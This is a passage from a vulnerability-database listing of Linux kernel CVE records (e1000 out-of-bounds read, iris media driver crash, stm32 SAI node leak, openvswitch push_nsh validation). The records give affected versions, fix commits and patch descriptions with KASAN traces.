"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:54.095Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4ccfa56f272241e8d8e2c38191fdbb03df489d80"
},
{
"url": "https://git.kernel.org/stable/c/278b7cfe0d4da7502c7fd679b15032f014c92892"
},
{
"url": "https://git.kernel.org/stable/c/ad7a2a45e2417ac54089926b520924f8f0d91aea"
},
{
"url": "https://git.kernel.org/stable/c/2c4c0c09f9648ba766d399917d420d03e7b3e1f8"
},
{
"url": "https://git.kernel.org/stable/c/26c8bebc2f25288c2bcac7bc0a7662279a0e817c"
},
{
"url": "https://git.kernel.org/stable/c/ee7c125fb3e8b04dd46510130b9fc92380e5d578"
},
{
"url": "https://git.kernel.org/stable/c/9c72a5182ed92904d01057f208c390a303f00a0f"
}
],
"title": "e1000: fix OOB in e1000_tbi_should_accept()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71093",
"datePublished": "2026-01-13T15:34:53.803Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:54.095Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68812 (GCVE-0-2025-68812)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
media: iris: Add sanity check for stop streaming
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: iris: Add sanity check for stop streaming
Add sanity check in iris_vb2_stop_streaming. If inst->state is
already IRIS_INST_ERROR, we should skip the stream_off operation
because it would still send packets to the firmware.
In iris_kill_session, inst->state is set to IRIS_INST_ERROR and
session_close is executed, which will kfree(inst_hfi_gen2->packet).
If stop_streaming is called afterward, it will cause a crash.
[bod: remove qcom from patch title]
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/qcom/iris/iris_vb2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f8b136296722e258ec43237a35f72c92a6d4501a",
"status": "affected",
"version": "11712ce70f8e52fc94365b48ee15aec806b02422",
"versionType": "git"
},
{
"lessThan": "ad699fa78b59241c9d71a8cafb51525f3dab04d4",
"status": "affected",
"version": "11712ce70f8e52fc94365b48ee15aec806b02422",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/qcom/iris/iris_vb2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.15"
},
{
"lessThan": "6.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: iris: Add sanity check for stop streaming\n\nAdd sanity check in iris_vb2_stop_streaming. If inst-\u003estate is\nalready IRIS_INST_ERROR, we should skip the stream_off operation\nbecause it would still send packets to the firmware.\n\nIn iris_kill_session, inst-\u003estate is set to IRIS_INST_ERROR and\nsession_close is executed, which will kfree(inst_hfi_gen2-\u003epacket).\nIf stop_streaming is called afterward, it will cause a crash.\n\n[bod: remove qcom from patch title]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:17.811Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f8b136296722e258ec43237a35f72c92a6d4501a"
},
{
"url": "https://git.kernel.org/stable/c/ad699fa78b59241c9d71a8cafb51525f3dab04d4"
}
],
"title": "media: iris: Add sanity check for stop streaming",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68812",
"datePublished": "2026-01-13T15:29:17.811Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-13T15:29:17.811Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71081 (GCVE-0-2025-71081)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ASoC: stm32: sai: fix OF node leak on probe
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: stm32: sai: fix OF node leak on probe
The reference taken to the sync provider OF node when probing the
platform device is currently only dropped if the set_sync() callback
fails during DAI probe.
Make sure to drop the reference on platform probe failures (e.g. probe
deferral) and on driver unbind.
This also avoids a potential use-after-free in case the DAI is ever
reprobed without first rebinding the platform driver.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
5914d285f6b782892a91d6621723fdc41a775b15 , < 7daa50a2157e41c964b745ab1dc378b5b3b626d1
(git)
Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < acda653169e180b1d860dbb6bc5aceb105858394 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < 4054a3597d047f3fe87864ef87f399b5d523e6c0 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < bae74771fc5d3b2a9cf6f5aa64596083d032c4a3 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < 3752afcc6d80d5525e236e329895ba2cb93bcb26 (git) Affected: 5914d285f6b782892a91d6621723fdc41a775b15 , < 23261f0de09427367e99f39f588e31e2856a690e (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/stm/stm32_sai.c",
"sound/soc/stm/stm32_sai_sub.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7daa50a2157e41c964b745ab1dc378b5b3b626d1",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "acda653169e180b1d860dbb6bc5aceb105858394",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "4054a3597d047f3fe87864ef87f399b5d523e6c0",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "bae74771fc5d3b2a9cf6f5aa64596083d032c4a3",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "3752afcc6d80d5525e236e329895ba2cb93bcb26",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
},
{
"lessThan": "23261f0de09427367e99f39f588e31e2856a690e",
"status": "affected",
"version": "5914d285f6b782892a91d6621723fdc41a775b15",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/stm/stm32_sai.c",
"sound/soc/stm/stm32_sai_sub.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:42.791Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7daa50a2157e41c964b745ab1dc378b5b3b626d1"
},
{
"url": "https://git.kernel.org/stable/c/acda653169e180b1d860dbb6bc5aceb105858394"
},
{
"url": "https://git.kernel.org/stable/c/4054a3597d047f3fe87864ef87f399b5d523e6c0"
},
{
"url": "https://git.kernel.org/stable/c/bae74771fc5d3b2a9cf6f5aa64596083d032c4a3"
},
{
"url": "https://git.kernel.org/stable/c/3752afcc6d80d5525e236e329895ba2cb93bcb26"
},
{
"url": "https://git.kernel.org/stable/c/23261f0de09427367e99f39f588e31e2856a690e"
}
],
"title": "ASoC: stm32: sai: fix OF node leak on probe",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71081",
"datePublished": "2026-01-13T15:34:45.503Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:42.791Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68785 (GCVE-0-2025-68785)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net: openvswitch: fix middle attribute validation in push_nsh() action
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix middle attribute validation in push_nsh() action
The push_nsh() action structure looks like this:
OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...))
The outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK'ed by the
nla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost
OVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK'ed by the nla_for_each_nested()
inside nsh_key_put_from_nlattr(). But nothing checks if the attribute
in the middle is OK. We don't even check that this attribute is the
OVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data()
calls - first time directly while calling validate_push_nsh() and the
second time as part of the nla_for_each_nested() macro, which isn't
safe, potentially causing invalid memory access if the size of this
attribute is incorrect. The failure may not be noticed during
validation due to larger netlink buffer, but cause trouble later during
action execution where the buffer is allocated exactly to the size:
BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]
Read of size 184 at addr ffff88816459a634 by task a.out/22624
CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary)
Call Trace:
<TASK>
dump_stack_lvl+0x51/0x70
print_address_description.constprop.0+0x2c/0x390
kasan_report+0xdd/0x110
kasan_check_range+0x35/0x1b0
__asan_memcpy+0x20/0x60
nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]
push_nsh+0x82/0x120 [openvswitch]
do_execute_actions+0x1405/0x2840 [openvswitch]
ovs_execute_actions+0xd5/0x3b0 [openvswitch]
ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch]
genl_family_rcv_msg_doit+0x1d6/0x2b0
genl_family_rcv_msg+0x336/0x580
genl_rcv_msg+0x9f/0x130
netlink_rcv_skb+0x11f/0x370
genl_rcv+0x24/0x40
netlink_unicast+0x73e/0xaa0
netlink_sendmsg+0x744/0xbf0
__sys_sendto+0x3d6/0x450
do_syscall_64+0x79/0x2c0
entry_SYSCALL_64_after_hwframe+0x76/0x7e
</TASK>
Let's add some checks that the attribute is properly sized and it's
the only one attribute inside the action. Technically, there is no
real reason for OVS_KEY_ATTR_NSH to be there, as we know that we're
pushing an NSH header already, it just creates extra nesting, but
that's how uAPI works today. So, keeping as it is.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < d0c135b8bbbcf92836068fd395bebeb7ae6c7bef
(git)
Affected: b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < 3bc2efff20a38b2c7ca18317649715df0dd62ced (git) Affected: b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < 1b569db9c2f28b599e40050524aae5f7332bc294 (git) Affected: b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < 10ffc558246f2c75619aedda0921906095e46702 (git) Affected: b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < 2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9 (git) Affected: b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < c999153bfb2d1d9b295b7010d920f2a7c6d7595f (git) Affected: b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3 , < 5ace7ef87f059d68b5f50837ef3e8a1a4870c36e (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/openvswitch/flow_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d0c135b8bbbcf92836068fd395bebeb7ae6c7bef",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "3bc2efff20a38b2c7ca18317649715df0dd62ced",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "1b569db9c2f28b599e40050524aae5f7332bc294",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "10ffc558246f2c75619aedda0921906095e46702",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "c999153bfb2d1d9b295b7010d920f2a7c6d7595f",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
},
{
"lessThan": "5ace7ef87f059d68b5f50837ef3e8a1a4870c36e",
"status": "affected",
"version": "b2d0f5d5dc53532e6f07bc546a476a55ebdfe0f3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/openvswitch/flow_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: fix middle attribute validation in push_nsh() action\n\nThe push_nsh() action structure looks like this:\n\n OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...))\n\nThe outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK\u0027ed by the\nnla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost\nOVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK\u0027ed by the nla_for_each_nested()\ninside nsh_key_put_from_nlattr(). But nothing checks if the attribute\nin the middle is OK. We don\u0027t even check that this attribute is the\nOVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data()\ncalls - first time directly while calling validate_push_nsh() and the\nsecond time as part of the nla_for_each_nested() macro, which isn\u0027t\nsafe, potentially causing invalid memory access if the size of this\nattribute is incorrect. The failure may not be noticed during\nvalidation due to larger netlink buffer, but cause trouble later during\naction execution where the buffer is allocated exactly to the size:\n\n BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]\n Read of size 184 at addr ffff88816459a634 by task a.out/22624\n\n CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary)\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x51/0x70\n print_address_description.constprop.0+0x2c/0x390\n kasan_report+0xdd/0x110\n kasan_check_range+0x35/0x1b0\n __asan_memcpy+0x20/0x60\n nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch]\n push_nsh+0x82/0x120 [openvswitch]\n do_execute_actions+0x1405/0x2840 [openvswitch]\n ovs_execute_actions+0xd5/0x3b0 [openvswitch]\n ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch]\n genl_family_rcv_msg_doit+0x1d6/0x2b0\n genl_family_rcv_msg+0x336/0x580\n genl_rcv_msg+0x9f/0x130\n netlink_rcv_skb+0x11f/0x370\n genl_rcv+0x24/0x40\n netlink_unicast+0x73e/0xaa0\n netlink_sendmsg+0x744/0xbf0\n __sys_sendto+0x3d6/0x450\n do_syscall_64+0x79/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\nLet\u0027s add some checks that the attribute is properly sized and it\u0027s\nthe only one attribute inside the action. Technically, there is no\nreal reason for OVS_KEY_ATTR_NSH to be there, as we know that we\u0027re\npushing an NSH header already, it just creates extra nesting, but\nthat\u0027s how uAPI works today. So, keeping as it is."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:02.370Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d0c135b8bbbcf92836068fd395bebeb7ae6c7bef"
},
{
"url": "https://git.kernel.org/stable/c/3bc2efff20a38b2c7ca18317649715df0dd62ced"
},
{
"url": "https://git.kernel.org/stable/c/1b569db9c2f28b599e40050524aae5f7332bc294"
},
{
"url": "https://git.kernel.org/stable/c/10ffc558246f2c75619aedda0921906095e46702"
},
{
"url": "https://git.kernel.org/stable/c/2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9"
},
{
"url": "https://git.kernel.org/stable/c/c999153bfb2d1d9b295b7010d920f2a7c6d7595f"
},
{
